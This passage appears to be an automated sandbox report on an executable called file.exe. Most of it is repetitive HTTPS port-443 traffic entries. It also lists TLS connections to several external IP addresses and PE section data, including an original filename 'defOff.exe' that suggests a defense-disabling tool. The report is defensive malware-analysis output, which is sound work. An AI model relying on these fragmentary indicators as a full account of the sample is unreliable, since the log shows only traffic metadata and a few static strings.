              Source: unknownNetwork traffic detected: HTTP traffic on port 49955 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49829
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49828
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49949
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
              Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
              Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
              Source: unknownNetwork traffic detected: HTTP traffic on port 50061 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
              Source: unknownNetwork traffic detected: HTTP traffic on port 50017 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
              Source: unknownNetwork traffic detected: HTTP traffic on port 49968 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50049 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50026 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
              Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49671 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50095 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49911 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49851 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
              Source: unknownNetwork traffic detected: HTTP traffic on port 50084 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49888
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49887
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
              Source: unknownNetwork traffic detected: HTTP traffic on port 50038 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
              Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50050 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50110 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50005 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
              Source: unknownNetwork traffic detected: HTTP traffic on port 50083 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49999
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49998
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49876
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49875
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49996
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49995
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
              Source: unknownNetwork traffic detected: HTTP traffic on port 49923 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49994
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49993
              Source: unknownNetwork traffic detected: HTTP traffic on port 50016 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49992
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49870
              Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50109 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50072 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50027 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49867
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49988
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49866
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49987
              Source: unknownNetwork traffic detected: HTTP traffic on port 50013 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50036 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50059 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50094 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50071 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50105
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50108
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50107
              Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49975 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50060 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50109
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50100
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50102
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50101
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50104
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50103
              Source: unknownNetwork traffic detected: HTTP traffic on port 50025 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49999 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50111
              Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49930 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50110
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50113
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50112
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50114
              Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50001 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49986 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49963 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50007
              Source: unknownNetwork traffic detected: HTTP traffic on port 50037 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50006
              Source: unknownNetwork traffic detected: HTTP traffic on port 50012 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50009
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50008
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
              Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50093 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50001
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50000
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50003
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50002
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50005
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50004
              Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50048 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49941 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50082 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50105 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50003 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49965 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49942 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49977 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50081 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50035 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49954 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50014 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50070 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49988 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50046 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50092 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50047 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50024 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49998 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49931 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50058 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50002 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49987 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50069 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49949 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50054
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50053
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50056
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50055
              Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50058
              Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50057
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50059
              Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49984 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50022 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50061
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50060
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50063
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50062
              Source: unknownNetwork traffic detected: HTTP traffic on port 50068 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50102 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50045 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49950 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49996 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50010 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50065
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50064
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50067
              Source: unknownNetwork traffic detected: HTTP traffic on port 50091 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50113 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50056 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50066
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50069
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50068
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50070
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50072
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50071
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50074
              Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50073
              Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50080 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50009 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50034 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50076
              Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50075
              Source: unknownNetwork traffic detected: HTTP traffic on port 50057 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50078
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50077
              Source: unknownNetwork traffic detected: HTTP traffic on port 50114 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50079
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50081
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50080
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50083
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50082
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50085
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50084
              Source: unknownNetwork traffic detected: HTTP traffic on port 49904 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50087
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50086
              Source: unknownNetwork traffic detected: HTTP traffic on port 49870 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50089
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50088
              Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50079 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50090
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50092
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50091
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50094
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50093
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50096
              Source: unknownNetwork traffic detected: HTTP traffic on port 49938 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50023 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50095
              Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50018
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50017
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50019
              Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49951 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49974 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50032 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50010
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50012
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50011
              Source: unknownNetwork traffic detected: HTTP traffic on port 50055 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50014
              Source: unknownNetwork traffic detected: HTTP traffic on port 50090 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50013
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50016
              Source: unknownNetwork traffic detected: HTTP traffic on port 50078 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50015
              Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50029
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50028
              Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50021
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50020
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50023
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50022
              Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50025
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50024
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50027
              Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50026
              Source: unknownNetwork traffic detected: HTTP traffic on port 49985 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50000 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50021 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50030
              Source: unknownNetwork traffic detected: HTTP traffic on port 50067 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50103 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50039
              Source: unknownNetwork traffic detected: HTTP traffic on port 49995 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50011 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50032
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50031
              Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50034
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50033
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50036
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50035
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50038
              Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50037
              Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50040
              Source: unknownNetwork traffic detected: HTTP traffic on port 50066 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50104 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50089 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49973 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50033 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50043
              Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50042
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50045
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50044
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50047
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50046
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50049
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50048
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50050
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50052
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50051
              Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50044 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50042 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50007 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49912 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49866 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50018 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50077 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50053 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50088 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49924 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50076 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50099 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50031 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49992 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50043 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50100 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49677 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49994 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50020 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50054 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50111 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50006 -> 443
              Source: unknownHTTPS traffic detected: 104.21.66.38:443 -> 192.168.2.7:49704 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.7:49705 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.66.38:443 -> 192.168.2.7:49706 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.66.38:443 -> 192.168.2.7:49712 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.66.38:443 -> 192.168.2.7:49718 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.66.38:443 -> 192.168.2.7:49724 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.66.38:443 -> 192.168.2.7:49730 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.66.38:443 -> 192.168.2.7:49737 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.7:49736 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.66.38:443 -> 192.168.2.7:49757 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 2.18.84.141:443 -> 192.168.2.7:49812 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 2.18.84.141:443 -> 192.168.2.7:49814 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.7:49932 version: TLS 1.2

              System Summary

              barindex
              Source: file.exeStatic PE information: section name:
              Source: file.exeStatic PE information: section name: .rsrc
              Source: file.exeStatic PE information: section name: .idata
              Source: file.exeStatic PE information: section name:
              Source: file.exe, 00000000.00000003.1570167440.0000000005CB9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1575316958.0000000005B42000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
